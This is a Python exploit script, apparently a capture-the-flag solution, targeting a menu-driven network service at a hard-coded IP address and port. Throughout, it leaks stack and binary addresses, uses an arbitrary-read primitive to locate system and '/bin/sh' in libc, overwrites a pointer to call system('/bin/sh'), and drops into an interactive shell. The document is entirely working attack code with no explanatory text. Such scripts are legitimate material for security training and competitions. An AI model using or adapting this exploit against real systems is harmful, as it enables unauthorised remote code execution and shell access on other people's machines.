from codez import *


r = Remote('localhost',1234)
r = Remote('175.119.158.134',5559)

r.read('>')
r.write('1\n');r.read('?');r.write('1\n');r.read('>')
r.write('2\n')
r.read(':');r.write('a\n')
r.read(':');r.write('b\n')
r.read('>')
r.write('1\n');r.read('?');r.write('2\n');r.read('>')
r.write('2\n')
r.read(':');r.write('a\n')
r.read(':');r.write('b\n')
r.read('>')
r.write('1\n');r.read('?');r.write('1\n');r.read('>')
r.write('4\n');r.read('?');r.write('1\n');
r.write('A'*20 + "\n")
r.read('>')
r.write('1\n');r.read('?');r.write('1\n');r.read('>')
r.write('3\n')
stackx=unpack('I',r.read('>').split('A'*16,1)[1][:4])[0]
print hex(stackx)
r.write('1\n');r.read('?');r.write('2\n');r.read('>')
r.write('4\n');r.read('?');r.write('1\n');
r.write(pack('I',stackx+136)*6 + "\n")
r.read('>')
r.write('1\n');r.read('?');r.write('1\n');r.read('>')
r.write('3\n')

def read4(addr,xint=True):
    r.write('1\n');r.read('?');r.write('2\n');r.read('>')
    r.write('4\n');r.read('?');r.write('1\n');
    r.write(pack('I',addr)*6 + "\n")
    r.read('>')
    r.write('1\n');r.read('?');r.write('1\n');r.read('>')
    r.write('3\n')
    x=r.read('>')
    if xint:
        return x.split('DATA: ',1)[1].split("\n")[0][:4].ljust(4,"\x00")
    else:
    #    print `x`
        return x.split('DATA: ',1)[1].split("\n")[0]
# def xread(addr,size):
#     ret =[]
#     if size < 4:
#         return read4(addr)[:size]
#     for i in range(size>>2):
#         ret.append(read4(addr+i*4))
#     return ''.join(ret)

binary = unpack('I',r.read('>').split('DATA: ',1)[1][:4])[0] -0xa10
print hex(binary)


a=binary+0xce9
addr=unpack('I',read4(a))[0]+a+4 -884400
binsh = 1427675 + addr
system = addr + 240880

r.write('1\n');r.read('?');r.write('2\n');r.read('>')
r.write('4\n');r.read('?');r.write('1\n');
r.write(pack('I',stackx+0x38)*6 + "\n")
r.read('>')

#raw_input('x')
# print hex(addr)
# while not read4(addr,xint=False).startswith("ELF"):
#     if "\x00" in pack('I',addr):
#         addr -= 0x1000
#     addr -= 0x1000
    
# print hex(addr)
# fd=open('/tmp/xbin1','w')
# while True:
#     x=read4(read,xint=False)
#     if not x:
#         x = "\x00"
#     print `x`
#     fd.write(x)
#     fd.flush()
#     read+=len(x)
# a=binary+0xd9f
# print hex(unpack('I',read4(a))[0]+a+4)
r.write('1\n');r.read('?');r.write('1\n');r.read('>')
r.write('4\n');r.read('?');r.write('2\n');
r.write(pack('III',system,0x41424344,binsh)+"\n")
r.read('>')
r.write('5\n')
r.interactive()